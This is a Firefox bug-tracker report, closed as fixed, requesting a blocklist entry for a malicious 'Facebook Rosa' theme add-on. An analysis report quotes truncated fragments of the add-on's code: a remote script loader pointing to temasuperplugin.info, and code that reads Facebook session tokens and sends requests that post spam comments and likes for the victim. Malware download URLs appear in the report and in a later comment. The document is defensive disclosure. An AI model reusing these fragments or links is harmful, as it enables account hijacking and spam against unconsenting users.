Malicious "Facebook Rosa" add-on

RESOLVED FIXED

Status


Toolkit
Blocklisting
5 years ago
a year ago

People

(Reporter: MarkH, Assigned: jorgev)

Tracking

Firefox Tracking Flags

(Not tracked)

Details

Attachments

(1 attachment)

156.41 KB, application/octet-stream
(Reporter)

Description

5 years ago
Created attachment 613147
20120407_rosathemenplus.zip

User Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_3) AppleWebKit/535.19 (KHTML, like Gecko) Chrome/18.0.1025.142 Safari/535.19

Steps to reproduce:

Downloaded add-on from http://rosathemenplus.com/plugin.xpi


Actual results:

Report for http://rosathemenplus.com/plugin.xpi

** Summary **

On install, it will begin programmatically sending spam to your Facebook friends and have you like pages, all without your knowledge or consent.

** Embedded and Remote Files **

lib.js
http://temasuperplugin.info?'+Math.random()
icon48.png
icon16.png
icon128.png
manifest.json


** Embedded Metadata **



** Files Loaded **



** Remote Javascript Loaded **

...(a=(b=document).createElement('script')).src='http://temasuperplugin.info?'+Math...
"description": "Verwandeln Sie Ihr Facebook in rosa!",
"content_scripts": [


** Facebook Paths Accessed **

... F
m"}9(3.2.4("o.5/b/a/q.6")!=-1||3.2.4("/b/a/s.6")!=-1){m.3.2=\'7://f.5/t.6?g
\'...
...c['open']('GET',
'http://www.facebook.com/ajax/typeahead/first_degree.php?__a=1&...
var d =
'http://www.facebook.com/ajax/connect/external_edge_comment.php?__a=1';
var d =
'http://www.facebook.com/ajax/connect/external_node_connect.php?__a=1';
if (location.href.match(/^http:\/\/(www\.)?facebook.com/i)) {
"name": "Facebook: Rosa Themen-Plugin",
"description": "Verwandeln Sie Ihr Facebook in rosa!",


** Facebook Data Accessed **

var fb_dtsg = Env.fb_dtsg;
user_id = readCookie('c_user');
...d + '&post_form_id=' + post_form_id + '&fb_dtsg=' + fb_dtsg + '&lsd' +
'&post_fo...
var fb_dtsg = Env.fb_dtsg;
..._widget' + '&nctr[_impid]=' + impid + '&fb_dtsg=' + fb_dtsg + '&lsd' +
'&post_fo...
user_id = readCookie('c_user');


** HTTP Requests **

var c = new XMLHttpRequest();
...c['open']('GET',
'http://www.facebook.com/ajax/typeahead/first_degree.php?__a=1&...
c['open']('POST', d, true);
var c = new XMLHttpRequest();
c['open']('POST', d, true);


** All URLs Loaded or Mentioned **

...var blog = "http://rosaausgabepro.com/farbe/" +
randomFromTo(8601,8800) + ".php"...
...c['open']('GET',
'http://www.facebook.com/ajax/typeahead/first_degree.php?__a=1&...
var d =
'http://www.facebook.com/ajax/connect/external_edge_comment.php?__a=1';
var d =
'http://www.facebook.com/ajax/connect/external_node_connect.php?__a=1';
...document).createElement('script')).src='http://temasuperplugin.info?'+Math.rando...
"update_url": "http://rosaplugin.info/chrome.xml",




Expected results:

It should not post Facebook messages or like pages without your knowledge or consent.
(Assignee)

Comment 1

5 years ago
ID: pink@rosaplugin.info
Assignee: nobody → jorge
Status: UNCONFIRMED → ASSIGNED
Ever confirmed: true
(Assignee)

Comment 2

5 years ago
Blocked: https://addons.mozilla.org/en-US/firefox/blocked/i84
Status: ASSIGNED → RESOLVED
Last Resolved: 5 years ago
Resolution: --- → FIXED

Comment 3

5 years ago
Hi, can you ban this spammer add-on too?
http://faceeklenti.com/
http://faceeklenti.com/firefox.php
http://faceeklenti.com/eklenti/facebook.xpi

You may not access the website by having a Turkish IP address.

You can try to access the site via http://www.gizlen.net/, a Turkish web-based proxy.
(Assignee)

Comment 4

5 years ago
Please read the blocklisting guidelines (https://wiki.mozilla.org/Blocklisting) and file a new blocklist bug if you think it matches our requisites.
Product: addons.mozilla.org → Toolkit